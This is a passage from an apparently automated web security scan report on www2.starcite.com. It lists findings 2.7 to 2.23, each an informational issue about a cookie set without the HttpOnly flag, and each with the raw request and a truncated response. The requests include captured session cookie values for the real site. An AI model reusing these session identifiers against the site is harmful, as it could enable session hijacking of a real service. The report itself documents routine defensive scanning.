Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:10:35 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:33:03 GMT;path=/
Content-Length: 16140

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...

2.7. http://www2.starcite.com/starcite/customers

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/customers

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/customers HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:12:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:12:10 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:34:41 GMT;path=/
Content-Length: 20570

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...

2.8. http://www2.starcite.com/starcite/destinationsolutions/finddestinations

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/destinationsolutions/finddestinations

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/destinationsolutions/finddestinations HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:11:15 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:11:15 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=54
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:33:50 GMT;path=/
Content-Length: 36037

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...

2.9. http://www2.starcite.com/starcite/elqNow/elqCfg.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/elqNow/elqCfg.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/elqNow/elqCfg.js HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:18 GMT
Server: Apache
Last-Modified: Wed, 28 Jan 2009 17:46:02 GMT
ETag: "1000000002e6e-bf3-4618e8b9fa238"
Accept-Ranges: bytes
Content-Length: 3059
Content-Type: application/javascript
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:44 GMT;path=/

//------------------------------------------------------
// Copyright Eloqua Corporation.
//
var elqSiteID = '1142';
var elqVer = 'v200';
//
var elqERoot = 'now.eloqua.com/';
var elqSecERoot =
...[SNIP]...

2.10. http://www2.starcite.com/starcite/elqNow/elqImg.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/elqNow/elqImg.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/elqNow/elqImg.js HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:20 GMT
Server: Apache
Last-Modified: Wed, 28 Jan 2009 17:46:10 GMT
ETag: "1000000002e74-3bf-4618e8c1b9be4"
Accept-Ranges: bytes
Content-Length: 959
Content-Type: application/javascript
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:46 GMT;path=/

// Copyright Eloqua Corporation.
var elqWDt = new Date(20020101);
var elqDt = new Date();
var elqMs = elqDt.getMilliseconds();
var elqTzo = elqWDt.getTimezoneOffset();
var elqRef2 = '';
if (type
...[SNIP]...

2.11. http://www2.starcite.com/starcite/files/SIMPLIFY2.png

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/files/SIMPLIFY2.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/files/SIMPLIFY2.png HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:30 GMT
Server: Apache
Last-Modified: Mon, 04 Oct 2010 15:36:17 GMT
ETag: "10000000033a0-274c-491cc4e25bf26"
Accept-Ranges: bytes
Content-Length: 10060
Content-Type: image/png
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:56 GMT;path=/

.PNG
.
...IHDR...Z...[.....|......    pHYs.........g..R....tIME..
.."..E......tEXtAuthor....H....tEXtDescription..    !#...
tEXtCopyright....:....tEXtCreation time.5..    ...    tEXtSoftware.]p.:....tEXtDisclai
...[SNIP]...

2.12. http://www2.starcite.com/starcite/files/Xerox_logo.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/files/Xerox_logo.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/files/Xerox_logo.gif HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:27 GMT
Server: Apache
Last-Modified: Mon, 03 Nov 2008 13:37:59 GMT
ETag: "1000000002306-820-45ac90e26b82c"
Accept-Ranges: bytes
Content-Length: 2080
Content-Type: image/gif
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:53 GMT;path=/

GIF87ad........,.......Zd....>D....v|.....<....jt.......>L..,.............Zd.......v|..<....&4.......N\.R\....jt..........&4....ft..........:D.bl.~.....FT.~.....FT.:D...."4.......&4.......r|..,.......
...[SNIP]...

2.13. http://www2.starcite.com/starcite/files/garland_favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/files/garland_favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/files/garland_favicon.ico HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=174720036.244046565.1293976610.1293976610.1293976610.1; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:45 GMT
Server: Apache
Last-Modified: Tue, 26 Aug 2008 00:53:00 GMT
ETag: "1000000002281-e36-45552534bd300"
Accept-Ranges: bytes
Content-Length: 3638
Content-Type: image/x-icon
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:20:11 GMT;path=/

..............h...&... ..............(....... ...........@......................................B...........`...#...R...............p................|..:.......L...W...........v...b.......(....... .
...[SNIP]...

2.14. http://www2.starcite.com/starcite/files/garland_logo.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/files/garland_logo.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/files/garland_logo.gif HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:22 GMT
Server: Apache
Last-Modified: Wed, 27 Aug 2008 18:45:00 GMT
ETag: "1000000002282-b42-455756ae88300"
Accept-Ranges: bytes
Content-Length: 2882
Content-Type: image/gif
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:47 GMT;path=/

GIF89a..(.............FFF........................sss???rrrcccbbb..................SSS...]]]...tttKKK...{{{.......................................hhh...qqq........................^^^.........|||}}}....
...[SNIP]...

2.15. http://www2.starcite.com/starcite/files/icons/uploaded_images/browser-webbased-app-_icon_sm.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/files/icons/uploaded_images/browser-webbased-app-_icon_sm.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/files/icons/uploaded_images/browser-webbased-app-_icon_sm.gif HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/whatwedo/overview
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=174720036.244046565.1293976610.1293976610.1293976610.1; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:59:42 GMT
Server: Apache
Last-Modified: Wed, 22 Oct 2008 08:25:00 GMT
ETag: "1000000002337-8b5-459d348ba8f00"
Accept-Ranges: bytes
Content-Length: 2229
Content-Type: image/gif
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:22:07 GMT;path=/

GIF89aF.F............z...'................<.........r................aN..+....q......D.......o...D.....Y..e..........T9.......<;.......N...........7.....B..Q..Z..u......]....................J....}....
...[SNIP]...

2.16. http://www2.starcite.com/starcite/files/icons/uploaded_images/destination-direction_icon_sm.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/files/icons/uploaded_images/destination-direction_icon_sm.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/files/icons/uploaded_images/destination-direction_icon_sm.gif HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/whatwedo/overview
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=174720036.244046565.1293976610.1293976610.1293976610.1; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:59:43 GMT
Server: Apache
Last-Modified: Wed, 22 Oct 2008 08:57:00 GMT
ETag: "100000000233f-a22-459d3bb2b6f00"
Accept-Ranges: bytes
Content-Length: 2594
Content-Type: image/gif
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:22:09 GMT;path=/

GIF89aF.F....;.............H).......k..................T..#..m..R........B..F....................v........`.......................,................z............\.....c........$.................z......
...[SNIP]...

2.17. http://www2.starcite.com/starcite/files/icons/uploaded_images/network-suppliers-group_icon_sm.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/files/icons/uploaded_images/network-suppliers-group_icon_sm.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/files/icons/uploaded_images/network-suppliers-group_icon_sm.gif HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/whatwedo/overview
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=174720036.244046565.1293976610.1293976610.1293976610.1; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:59:42 GMT
Server: Apache
Last-Modified: Wed, 22 Oct 2008 08:45:00 GMT
ETag: "1000000002366-a4c-459d390411b00"
Accept-Ranges: bytes
Content-Length: 2636
Content-Type: image/gif
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:22:07 GMT;path=/

GIF89aF.F.......z.....&....\......].....=..........L......%.....c..........."....................S.....;..........c...j..............j................i...o........r..0....a..............}.....n..A....
...[SNIP]...

2.18. http://www2.starcite.com/starcite/files/icons/uploaded_images/support-chat-forum_icon_sm.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/files/icons/uploaded_images/support-chat-forum_icon_sm.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/files/icons/uploaded_images/support-chat-forum_icon_sm.gif HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/whatwedo/overview
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=174720036.244046565.1293976610.1293976610.1293976610.1; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:59:43 GMT
Server: Apache
Last-Modified: Wed, 22 Oct 2008 08:50:00 GMT
ETag: "100000000237c-79e-459d3a222be00"
Accept-Ranges: bytes
Content-Length: 1950
Content-Type: image/gif
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:22:09 GMT;path=/

GIF89aF.F............w..,3..p....9..................R..........X..................c....e.....a.........3..E....[...w.....\...........Z..........L..................j.....x.............n...D...........p
...[SNIP]...

2.19. http://www2.starcite.com/starcite/files/kblog_0.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/files/kblog_0.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/files/kblog_0.jpg HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:30 GMT
Server: Apache
Last-Modified: Wed, 06 Jan 2010 18:39:39 GMT
ETag: "1000000003143-2d3c-47c8346ea7303"
Accept-Ranges: bytes
Content-Length: 11580
Content-Type: image/jpeg
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:56 GMT;path=/

......JFIF.............C.
.....
....

...........#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C.
........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;..........."..............................
...[SNIP]...

2.20. http://www2.starcite.com/starcite/files/logo_2010_vuc.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/files/logo_2010_vuc.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/files/logo_2010_vuc.jpg HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:30 GMT
Server: Apache
Last-Modified: Tue, 27 Jul 2010 22:43:11 GMT
ETag: "10000000032ca-1286-48c6639d9c317"
Accept-Ranges: bytes
Content-Length: 4742
Content-Type: image/jpeg
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:56 GMT;path=/

......JFIF.....`.`......Exif..II*..............C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!22222222222222222222222222222222222222222222222222.......}.."......
...[SNIP]...

2.21. http://www2.starcite.com/starcite/files/nbtafoundation.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/files/nbtafoundation.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/files/nbtafoundation.gif HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:30 GMT
Server: Apache
Last-Modified: Thu, 12 Aug 2010 18:35:03 GMT
ETag: "20000000032cb-f1c-48da49fdeed08"
Accept-Ranges: bytes
Content-Length: 3868
Content-Type: image/gif
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:56 GMT;path=/

GIF89aW.W.....<..:..=..@..A.    *o.1}.5..:..:..=.    >.
@..C.    E..J..J..1s.<~.@..C..G..I..K..O..R..6x.:..B..H..K..M..J..R..P..P..t."T.!R. V.$|.$y.%..)F.+N.(T.(\.)Z.+_.*{.*..)../..,..2[.0].1c.5e.1..1..2..1..4
...[SNIP]...

2.22. http://www2.starcite.com/starcite/files/partner_pfizer.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/files/partner_pfizer.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/files/partner_pfizer.gif HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/whatwedo/overview
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=174720036.244046565.1293976610.1293976610.1293976610.1; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:59:44 GMT
Server: Apache
Last-Modified: Mon, 01 Dec 2008 17:52:22 GMT
ETag: "10000000022d2-366-45cffdf7bfc15"
Accept-Ranges: bytes
Content-Length: 870
Content-Type: image/gif
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:22:10 GMT;path=/

GIF89a<.%....i..4n.....V..............L.....a....O...=.......!.......,....<.%....P.I../...1].dWi......0J..q...q8h...@6@4...r.D6.4..P.......L*...w.."....ZZ....Xy{.....I#......|z{..n...x.s|....E....H..
...[SNIP]...

2.23. http://www2.starcite.com/starcite/files/what-we-do-header.jpg

Summary

